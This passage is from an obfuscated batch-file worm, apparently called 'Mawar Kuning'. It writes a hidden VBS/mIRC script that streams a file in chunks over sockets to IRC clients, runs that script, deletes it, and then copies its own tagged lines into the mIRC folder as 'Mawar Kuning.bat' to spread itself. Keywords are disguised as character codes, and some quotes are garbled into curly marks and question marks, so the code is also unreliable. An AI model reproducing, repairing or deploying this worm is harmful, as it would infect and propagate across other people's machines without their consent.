%wc% ” .sockclose ” + %vs%37) + “sock_n” + %vs%97) + “me”>>irc.vbs% AMMM %
goto ircn% AMMM %
:ircn % ANNN %
%wc% ” .” + %vs%115) + %vs%101) + %vs%116) + ” ” + %vs%37) + “l 0?>>irc.vbs% ANNN %
%wc% ” .bre” + %vs%97) + “d ” + %vs%37) + “filee ” + %vs%37) + “l 4000 ” + %vs%38) + “le”>>irc.vbs % ANNN %
goto irco% ANNN %
:irco % AOOO %
%wc% ” .sockwrite -b ” + %vs%37) + “client_n” + %vs%97) + “me 4000 ” + %vs%38) + “le”>>irc.vbs% AOOO %
%wc% ” ” + %vs%37) + “l = ” + %vs%37) + “l + 4000?>>irc.vbs% AOOO %
goto ircp% AOOO %
:ircp % APPP %
%wc% ” .” + %vs%115) + %vs%101) + %vs%116) + ” ” + %vs%37) + “end 0?>>irc.vbs% APPP %
%wc% ” }”>>irc.vbs% APPP %
%wc% ” on 1:sockre” + %vs%97) + “d:” + %vs%37) + “client_n” + %vs%97) + “me: {”>>irc.vbs% APPP %
goto ircq % APPP %
:ircq % AQQQ %
%wc% ” .%fi% (” + %vs%37) + “l >= ” + %vs%36) + “file(” + %vs%37) + “filee).size) {”>>irc.vbs% AQQQ %
%wc% ” .” + %vs%115) + %vs%101) + %vs%116) + ” ” + %vs%37) + “end 1?>>irc.vbs% AQQQ %
goto ircr% AQQQ %
:ircr % ARRR %
%wc% ” .sockclose ” + %vs%37) + “client_n” + %vs%97) + “me”>>irc.vbs% ARRR %
%wc% ” .h” + %vs%97) + “lt”>>irc.vbs% ARRR %
%wc% ” } .else {”>>irc.vbs% ARRR %
goto ircs% ARRR %
:ircs % ASSS %
%wc% ” .%fi% (” + %vs%37) + “end != 1) {”>>irc.vbs% ASSS %
%wc% ” .bre” + %vs%97) + “d ” + %vs%37) + “filee ” + %vs%37) + “l 4000 ” + %vs%38) + “le”>>irc.vbs% ASSS %
goto irct% ASSS %
:irct % ATTT %
%wc% ” .sockwrite -b ” + %vs%37) + “client_n” + %vs%97) + “me 4000 ” + %vs%38) + “le”>>irc.vbs% ATTT %
%wc% ” ” + %vs%37) + “l = ” + %vs%37) + “l + 4000?>>irc.vbs% ATTT %
%wc% ” } } }”>>irc.vbs% ATTT %
goto ircu% ATTT %
:ircu % AUUU %
%wc% ” ” + %vs%97) + “li” + %vs%97) + “s cloze { .sockclose ” + %vs%37) + “sock_n” + %vs%97) + “me } “>>irc.vbs% AUUU %
echo file.Close >>irc.vbs% AUUU %
cscript irc.vbs% AUUU %
cls% AUUU %
goto eirc% AUUU %
:eirc % mawar-shadow %
del irc.vbs % mawar-shadow %
find “mawar-shadow”<%0>>mawarkuning.bat
copy mawarkuning.bat %mir%\Mawar Kuning.bat % mawar-shadow %
del mawarkuning.bat % mawar-shadow %
cls % mawar-shadow %